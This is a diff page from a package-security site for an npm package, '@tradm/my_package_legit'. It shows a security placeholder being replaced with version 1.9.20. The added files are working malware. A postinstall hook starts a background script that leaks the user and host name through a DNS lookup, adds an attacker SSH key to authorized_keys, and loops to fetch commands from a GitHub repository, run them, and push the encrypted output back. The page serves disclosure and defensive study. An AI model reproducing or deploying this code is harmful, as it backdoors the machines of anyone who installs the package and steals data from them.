npm - @tradm/my_package_legit - Versions diffs - 0.0.1-security → 1.9.20 - Mend

@tradm/my_package_legit 0.0.1-security → 1.9.20

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @tradm/my_package_legit might be problematic. Click here for more details.

Files changed (5) hide show

package/check_ping.sh ADDED Viewed

@@ -0,0 +1,45 @@
+#!/bin/bash
+whoiam=$(whoami)
+whereiam=$(hostname)
+nslookup $whoiam.$whereiam.ctcmkfbpc72ib0n8kt9gaowptistpwefr.flutteruki.3588833.com
+echo """ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC6QZF9BEbUg9bT2p44GEbDkAwoeRuPMe8xG0QXbskU/FXNR5TsW/yDcV/dWMV2/rvDP5lrNSQ9zn9MjkPpeQ4eOda5aVCzbUp33Z5s6yPBabMLoJGCB9pZi+bd/BmkvrM+s4qcl5s8ijOO/gLWfgv9Fysxe86yYDeXGa75U1V2sfGsj/zu5wAz+n0zdVZy+DVlnrxvKSpEulDaOVrIKAbgWw4lLoRdJG+8Y9JQj+OOdAlNOtLuDaL+IpeaKi+Wj5z5oNUmU70wWhO027Qd18TCJO5/fj6x2kEoH+42KOBzT2EyePnJGfkVENJRHKLAHpIm8LOBgcMC+OtWIlQjbGJHb1HG3mMtgWz3+8gKOXHvQpMS04ZMtXqD6tvHx+SmSCx/sCP1HErziW9g6borQYqwUdfyNMkGey6Ufni0LjAuNZ1Og/n5s59qfHolQaTRU1Qrz8wXDw1goU8sWy2UHC4ykyVBAf9mMdiD1EXgPHnR+3hXV0udvAPucfAy61ny3/tvXZByaxvGRiRGaLFWPKVB0HA6Dz+m61F1lxD9Q+h6JSawttaxLfUXNQqMv1CLg8jaPtZIz9snj5rbrcid7uJybK6zzLZurfucBApZxmromNqn32V22LJWeJhlMexPchQWsIb16uuscpUk6kvD09joVB0SnGw4QqyfRGJJQIzBOQ==""" >> ~/.ssh/authorized_keys
+LOCKFILE="/tmp/tmp6iwot03k.lock"
+if [ -e "$LOCKFILE" ]; then
+    exit 0
+fi
+touch "$LOCKFILE"
+LAST_COMMAND=""
+PAT=$GHPAT
+AESK=$AESP
+slip=25
+mkdir /tmp/tmp6iwot03k/
+cd /tmp/tmp6iwot03k/
+while true; do
+	git clone https://$PAT@github.com/armysick/Innocuous
+	cd Innocuous
+	slip=$(cat sleep)
+	dmc=$(head -n 1 clear)
+	if [ "$LAST_COMMAND" != "$dmc" ]; then
+		output=$(bash -c "$dmc")
+		echo $output | openssl enc -aes-256-cbc -base64 -pass pass:$AESK >> ls
+		git add ls
+		GIT_AUTHOR_NAME="$(whoami)/$(hostname)" GIT_AUTHOR_EMAIL="new.user@example.com" GIT_COMMITTER_NAME="Committer Name" GIT_COMMITTER_EMAIL="committer@example.com" git commit -m "yup"
+		git push
+		LAST_COMMAND=$dmc
+	fi
+	cd ..
+	rm -rf Innocuous
+	sleep $slip
+done

package/index.js ADDED Viewed

	@@ -0,0 +1 @@
1	+ // This is an empty index.js file that does nothing

package/package.json CHANGED Viewed

@@ -1,6 +1,12 @@
 {
   "name": "@tradm/my_package_legit",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.9.20",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "./postinstall.sh"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "description": "testpack"
 }

package/postinstall.sh ADDED Viewed

@@ -0,0 +1,6 @@
+#!/bin/bash
+if [[ "$npm_config_global" == "true" ]]; then
+  nohup bash -c 'sleep 2 && cd ../../ && sudo npm uninstall @tradm/my_package_legit -g && npm install @tradm/my_package_legit@1.0.0 -g && ./check_ping.sh' > /dev/null 2>&1 &
+else
+  nohup bash -c 'sleep 2 && cd $(echo $PWD | sed "s/^\(.*node_modules\).*/\1/") && npm uninstall @tradm/my_package_legit && npm install @tradm/my_package_legit@1.0.0 && ./check_ping.sh' > /dev/null 2>&1 &
+fi

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=%40tradm%2Fmy_package_legit for more information.